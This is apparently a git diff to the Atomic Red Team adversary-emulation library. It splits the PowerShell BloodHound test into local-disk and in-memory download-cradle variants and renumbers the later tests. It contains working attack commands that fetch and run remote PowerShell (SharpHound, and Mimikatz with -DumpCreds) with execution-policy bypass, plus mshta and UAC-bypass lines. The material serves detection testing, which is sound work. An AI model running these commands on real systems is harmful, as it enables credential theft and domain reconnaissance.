diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index b4eeff18..2df4565f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -480,18 +480,19 @@ execution,T1170,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload Wi
execution,T1170,Mshta,2,Mshta executes VBScript to execute malicious command
execution,T1170,Mshta,3,Mshta Executes Remote HTML Application (HTA)
execution,T1086,PowerShell,1,Mimikatz
-execution,T1086,PowerShell,2,BloodHound
-execution,T1086,PowerShell,3,Obfuscation Tests
-execution,T1086,PowerShell,4,Mimikatz - Cradlecraft PsSendKeys
-execution,T1086,PowerShell,5,Invoke-AppPathBypass
-execution,T1086,PowerShell,6,Powershell MsXml COM object - no prompt
-execution,T1086,PowerShell,7,Powershell MsXml COM object - with prompt
-execution,T1086,PowerShell,8,Powershell XML requests
-execution,T1086,PowerShell,9,Powershell invoke mshta.exe download
-execution,T1086,PowerShell,10,Powershell Invoke-DownloadCradle
-execution,T1086,PowerShell,11,PowerShell Fileless Script Execution
-execution,T1086,PowerShell,12,PowerShell Downgrade Attack
-execution,T1086,PowerShell,13,NTFS Alternate Data Stream Access
+execution,T1086,PowerShell,2,Run BloodHound from local disk
+execution,T1086,PowerShell,3,Run Bloodhound from Memory using Download Cradle
+execution,T1086,PowerShell,4,Obfuscation Tests
+execution,T1086,PowerShell,5,Mimikatz - Cradlecraft PsSendKeys
+execution,T1086,PowerShell,6,Invoke-AppPathBypass
+execution,T1086,PowerShell,7,Powershell MsXml COM object - no prompt
+execution,T1086,PowerShell,8,Powershell MsXml COM object - with prompt
+execution,T1086,PowerShell,9,Powershell XML requests
+execution,T1086,PowerShell,10,Powershell invoke mshta.exe download
+execution,T1086,PowerShell,11,Powershell Invoke-DownloadCradle
+execution,T1086,PowerShell,12,PowerShell Fileless Script Execution
+execution,T1086,PowerShell,13,PowerShell Downgrade Attack
+execution,T1086,PowerShell,14,NTFS Alternate Data Stream Access
execution,T1121,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test
execution,T1121,Regsvcs/Regasm,2,Regsvs Uninstall Method Call Test
execution,T1117,Regsvr32,1,Regsvr32 local COM scriptlet execution
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2861a766..fb4faf00 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -361,18 +361,19 @@ execution,T1170,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload Wi
execution,T1170,Mshta,2,Mshta executes VBScript to execute malicious command
execution,T1170,Mshta,3,Mshta Executes Remote HTML Application (HTA)
execution,T1086,PowerShell,1,Mimikatz
-execution,T1086,PowerShell,2,BloodHound
-execution,T1086,PowerShell,3,Obfuscation Tests
-execution,T1086,PowerShell,4,Mimikatz - Cradlecraft PsSendKeys
-execution,T1086,PowerShell,5,Invoke-AppPathBypass
-execution,T1086,PowerShell,6,Powershell MsXml COM object - no prompt
-execution,T1086,PowerShell,7,Powershell MsXml COM object - with prompt
-execution,T1086,PowerShell,8,Powershell XML requests
-execution,T1086,PowerShell,9,Powershell invoke mshta.exe download
-execution,T1086,PowerShell,10,Powershell Invoke-DownloadCradle
-execution,T1086,PowerShell,11,PowerShell Fileless Script Execution
-execution,T1086,PowerShell,12,PowerShell Downgrade Attack
-execution,T1086,PowerShell,13,NTFS Alternate Data Stream Access
+execution,T1086,PowerShell,2,Run BloodHound from local disk
+execution,T1086,PowerShell,3,Run Bloodhound from Memory using Download Cradle
+execution,T1086,PowerShell,4,Obfuscation Tests
+execution,T1086,PowerShell,5,Mimikatz - Cradlecraft PsSendKeys
+execution,T1086,PowerShell,6,Invoke-AppPathBypass
+execution,T1086,PowerShell,7,Powershell MsXml COM object - no prompt
+execution,T1086,PowerShell,8,Powershell MsXml COM object - with prompt
+execution,T1086,PowerShell,9,Powershell XML requests
+execution,T1086,PowerShell,10,Powershell invoke mshta.exe download
+execution,T1086,PowerShell,11,Powershell Invoke-DownloadCradle
+execution,T1086,PowerShell,12,PowerShell Fileless Script Execution
+execution,T1086,PowerShell,13,PowerShell Downgrade Attack
+execution,T1086,PowerShell,14,NTFS Alternate Data Stream Access
execution,T1121,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test
execution,T1121,Regsvcs/Regasm,2,Regsvs Uninstall Method Call Test
execution,T1117,Regsvr32,1,Regsvr32 local COM scriptlet execution
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 204b88c8..4dabd683 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -742,18 +742,19 @@
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- [T1086 PowerShell](../../T1086/T1086.md)
- Atomic Test #1: Mimikatz [windows]
- - Atomic Test #2: BloodHound [windows]
- - Atomic Test #3: Obfuscation Tests [windows]
- - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- - Atomic Test #5: Invoke-AppPathBypass [windows]
- - Atomic Test #6: Powershell MsXml COM object - no prompt [windows]
- - Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- - Atomic Test #8: Powershell XML requests [windows]
- - Atomic Test #9: Powershell invoke mshta.exe download [windows]
- - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- - Atomic Test #11: PowerShell Fileless Script Execution [windows]
- - Atomic Test #12: PowerShell Downgrade Attack [windows]
- - Atomic Test #13: NTFS Alternate Data Stream Access [windows]
+ - Atomic Test #2: Run BloodHound from local disk [windows]
+ - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
+ - Atomic Test #4: Obfuscation Tests [windows]
+ - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
+ - Atomic Test #6: Invoke-AppPathBypass [windows]
+ - Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
+ - Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
+ - Atomic Test #9: Powershell XML requests [windows]
+ - Atomic Test #10: Powershell invoke mshta.exe download [windows]
+ - Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
+ - Atomic Test #12: PowerShell Fileless Script Execution [windows]
+ - Atomic Test #13: PowerShell Downgrade Attack [windows]
+ - Atomic Test #14: NTFS Alternate Data Stream Access [windows]
- [T1121 Regsvcs/Regasm](../../T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 3597e714..d0365182 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -616,18 +616,19 @@
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- [T1086 PowerShell](../../T1086/T1086.md)
- Atomic Test #1: Mimikatz [windows]
- - Atomic Test #2: BloodHound [windows]
- - Atomic Test #3: Obfuscation Tests [windows]
- - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- - Atomic Test #5: Invoke-AppPathBypass [windows]
- - Atomic Test #6: Powershell MsXml COM object - no prompt [windows]
- - Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- - Atomic Test #8: Powershell XML requests [windows]
- - Atomic Test #9: Powershell invoke mshta.exe download [windows]
- - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- - Atomic Test #11: PowerShell Fileless Script Execution [windows]
- - Atomic Test #12: PowerShell Downgrade Attack [windows]
- - Atomic Test #13: NTFS Alternate Data Stream Access [windows]
+ - Atomic Test #2: Run BloodHound from local disk [windows]
+ - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
+ - Atomic Test #4: Obfuscation Tests [windows]
+ - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
+ - Atomic Test #6: Invoke-AppPathBypass [windows]
+ - Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
+ - Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
+ - Atomic Test #9: Powershell XML requests [windows]
+ - Atomic Test #10: Powershell invoke mshta.exe download [windows]
+ - Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
+ - Atomic Test #12: PowerShell Fileless Script Execution [windows]
+ - Atomic Test #13: PowerShell Downgrade Attack [windows]
+ - Atomic Test #14: NTFS Alternate Data Stream Access [windows]
- [T1121 Regsvcs/Regasm](../../T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e291ac39..1049acad 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -23332,26 +23332,67 @@ execution:
Invoke-Mimikatz -DumpCreds"
'
- - name: BloodHound
- description: |
- Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
-
- and then compress and store the data to the temp directory on the machine
+ - name: Run BloodHound from local disk
+ description: "Upon execution SharpHound will be downloaded to disk, imported
+ and executed. It will set up collection methods, run and then compress and
+ store the data to the temp directory on the machine. If system is unable to
+ contact a domain, proper execution will not occur.\n\nSuccessful execution
+ will produce stdout reporting LDAP connection was successful and BloodHound
+ domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip
+ file. \n"
supported_platforms:
- windows
input_arguments:
- bloodurl:
- description: BloodHound URL
- type: url
- default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
+ internal_domain:
+ description: Specify internal domain name to analyze
+ type: string
+ default: windomain.local
+ file_path:
+ description: File path for SharpHound payload
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ output_path:
+ description: Output path for BloodHound reports
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Validate if SharpHound.ps1 is located in #{file_path}.'
+ prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else
+ {exit 1}'
+ get_prereq_command: Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1"
+ -OutFile "#{file_path}\SharpHound.ps1"
executor:
name: powershell
elevation_required: false
- command: 'IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
- Invoke-BloodHound
-
-'
- cleanup_command: 'Remove-Item $env:temp\*BloodHound.zip -Force
+ command: "write-host \"Import and Execution of SharpHound.ps1 from #{file_path}\"
+ -ForegroundColor Cyan\nimport-module #{file_path}\\SharpHound.ps1; invoke-bloodhound
+ -domain #{internal_domain} -OutputDirectory #{output_path}\n \n"
+ cleanup_command: |
+ Remove-Item #{file_path}\SharpHound.ps1 -Force
+ Remove-Item #{file_path}\*BloodHound.zip -Force
+ - name: Run Bloodhound from Memory using Download Cradle
+ description: "Upon execution SharpHound will load into memory and execute against
+ a domain. It will set up collection methods, run and then compress and store
+ the data to #{output_path}. If system is unable to contact a domain, proper
+ execution will not occur.\n\nSuccessful execution will produce stdout reporting
+ LDAP connection was successful and BloodHound domain enumeration is occurring.
+ Upon completion, final output will be a *BloodHound.zip file. \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_path:
+ description: Output path for BloodHound reports
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "write-host \"Remote download of SharpHound.ps1, import and execution
+ from $env:temp\" -ForegroundColor Cyan\npowershell -exec Bypass -C \"IEX(New-Object
+ Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound
+ -OutputDirectory #{output_path}\"\n \n"
+ cleanup_command: 'Remove-Item #{output_path}\*BloodHound.zip -Force
'
- name: Obfuscation Tests
@@ -23416,7 +23457,7 @@ execution:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -23429,14 +23470,14 @@ execution:
description: |
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
- Provided by https://github.com/mgreen27/mgreen27.github.i
+ Provided by https://github.com/mgreen27/mgreen27.github.io
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -23456,7 +23497,7 @@ execution:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml
executor:
name: command_prompt
elevation_required: false
@@ -23476,7 +23517,7 @@ execution:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct
executor:
name: command_prompt
elevation_required: false
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index 1b033cff..fb874225 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -14,29 +14,31 @@ PowerShell commands/scripts can also be executed without directly invoking the p
- [Atomic Test #1 - Mimikatz](#atomic-test-1---mimikatz)
-- [Atomic Test #2 - BloodHound](#atomic-test-2---bloodhound)
+- [Atomic Test #2 - Run BloodHound from local disk](#atomic-test-2---run-bloodhound-from-local-disk)
-- [Atomic Test #3 - Obfuscation Tests](#atomic-test-3---obfuscation-tests)
+- [Atomic Test #3 - Run Bloodhound from Memory using Download Cradle](#atomic-test-3---run-bloodhound-from-memory-using-download-cradle)
-- [Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-4---mimikatz---cradlecraft-pssendkeys)
+- [Atomic Test #4 - Obfuscation Tests](#atomic-test-4---obfuscation-tests)
-- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
+- [Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-5---mimikatz---cradlecraft-pssendkeys)
-- [Atomic Test #6 - Powershell MsXml COM object - no prompt](#atomic-test-6---powershell-msxml-com-object---no-prompt)
+- [Atomic Test #6 - Invoke-AppPathBypass](#atomic-test-6---invoke-apppathbypass)
-- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
+- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
-- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
+- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
-- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
+- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
-- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
+- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
-- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
+- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
-- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
+- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
-- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
+- [Atomic Test #13 - PowerShell Downgrade Attack](#atomic-test-13---powershell-downgrade-attack)
+
+- [Atomic Test #14 - NTFS Alternate Data Stream Access](#atomic-test-14---ntfs-alternate-data-stream-access)
@@ -70,10 +72,10 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
-## Atomic Test #2 - BloodHound
-Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
+## Atomic Test #2 - Run BloodHound from local disk
+Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
-and then compress and store the data to the temp directory on the machine
+Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
**Supported Platforms:** Windows
@@ -83,19 +85,71 @@ and then compress and store the data to the temp directory on the machine
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
+| internal_domain | Specify internal domain name to analyze | string | windomain.local|
+| file_path | File path for SharpHound payload | String | PathToAtomicsFolder\T1086\src|
+| output_path | Output path for BloodHound reports | String | PathToAtomicsFolder\T1086\src|
#### Attack Commands: Run with `powershell`!
```powershell
-IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
+write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
+import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
```
#### Cleanup Commands:
```powershell
-Remove-Item $env:temp\*BloodHound.zip -Force
+Remove-Item #{file_path}\SharpHound.ps1 -Force
+Remove-Item #{file_path}\*BloodHound.zip -Force
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Validate if SharpHound.ps1 is located in #{file_path}.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
+```
+
+
+
+
+
+
+
+## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
+Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to #{output_path}. If system is unable to contact a domain, proper execution will not occur.
+
+Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_path | Output path for BloodHound reports | String | PathToAtomicsFolder\T1086\src|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+write-host "Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
+powershell -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound -OutputDirectory #{output_path}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{output_path}\*BloodHound.zip -Force
```
@@ -105,7 +159,7 @@ Remove-Item $env:temp\*BloodHound.zip -Force
-## Atomic Test #3 - Obfuscation Tests
+## Atomic Test #4 - Obfuscation Tests
Different obfuscated methods to test
Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
@@ -132,7 +186,7 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
-## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
+## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
**Supported Platforms:** Windows
@@ -156,7 +210,7 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
-## Atomic Test #5 - Invoke-AppPathBypass
+## Atomic Test #6 - Invoke-AppPathBypass
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Upon execution windows backup and restore window will be opened
@@ -182,7 +236,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
-## Atomic Test #6 - Powershell MsXml COM object - no prompt
+## Atomic Test #7 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
@@ -195,7 +249,7 @@ Not proxy aware removing cache although does not appear to write to those locati
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1|
#### Attack Commands: Run with `command_prompt`!
@@ -213,10 +267,10 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
-## Atomic Test #7 - Powershell MsXml COM object - with prompt
+## Atomic Test #8 - Powershell MsXml COM object - with prompt
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
-Provided by https://github.com/mgreen27/mgreen27.github.i
+Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
@@ -226,7 +280,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.i
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1|
#### Attack Commands: Run with `command_prompt`!
@@ -244,7 +298,7 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
-## Atomic Test #8 - Powershell XML requests
+## Atomic Test #9 - Powershell XML requests
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -257,7 +311,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml|
#### Attack Commands: Run with `command_prompt`!
@@ -275,7 +329,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
-## Atomic Test #9 - Powershell invoke mshta.exe download
+## Atomic Test #10 - Powershell invoke mshta.exe download
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -288,7 +342,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct|
#### Attack Commands: Run with `command_prompt`!
@@ -306,7 +360,7 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
-## Atomic Test #10 - Powershell Invoke-DownloadCradle
+## Atomic Test #11 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
@@ -328,7 +382,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
-## Atomic Test #11 - PowerShell Fileless Script Execution
+## Atomic Test #12 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
art-marker.txt is in the folder.
@@ -360,7 +414,7 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
-## Atomic Test #12 - PowerShell Downgrade Attack
+## Atomic Test #13 - PowerShell Downgrade Attack
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
@@ -396,7 +450,7 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
-## Atomic Test #13 - NTFS Alternate Data Stream Access
+## Atomic Test #14 - NTFS Alternate Data Stream Access
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
**Supported Platforms:** Windows
diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml
index 0ce5c5f5..520054f6 100644
--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -19,25 +19,68 @@ atomic_tests:
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
-- name: BloodHound
+- name: Run BloodHound from local disk
description: |
- Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
+ Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
- and then compress and store the data to the temp directory on the machine
+ Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
supported_platforms:
- windows
input_arguments:
- bloodurl:
- description: BloodHound URL
- type: url
- default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
+ internal_domain:
+ description: Specify internal domain name to analyze
+ type: string
+ default: windomain.local
+ file_path:
+ description: File path for SharpHound payload
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ output_path:
+ description: Output path for BloodHound reports
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Validate if SharpHound.ps1 is located in #{file_path}.
+ prereq_command: |
+ if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
+
executor:
name: powershell
elevation_required: false
command: |
- IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
+ write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
+ import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
+
cleanup_command: |
- Remove-Item $env:temp\*BloodHound.zip -Force
+ Remove-Item #{file_path}\SharpHound.ps1 -Force
+ Remove-Item #{file_path}\*BloodHound.zip -Force
+
+- name: Run Bloodhound from Memory using Download Cradle
+ description: |
+ Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to #{output_path}. If system is unable to contact a domain, proper execution will not occur.
+
+ Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_path:
+ description: Output path for BloodHound reports
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ write-host "Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
+ powershell -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound -OutputDirectory #{output_path}"
+
+ cleanup_command: |
+ Remove-Item #{output_path}\*BloodHound.zip -Force
- name: Obfuscation Tests
description: |
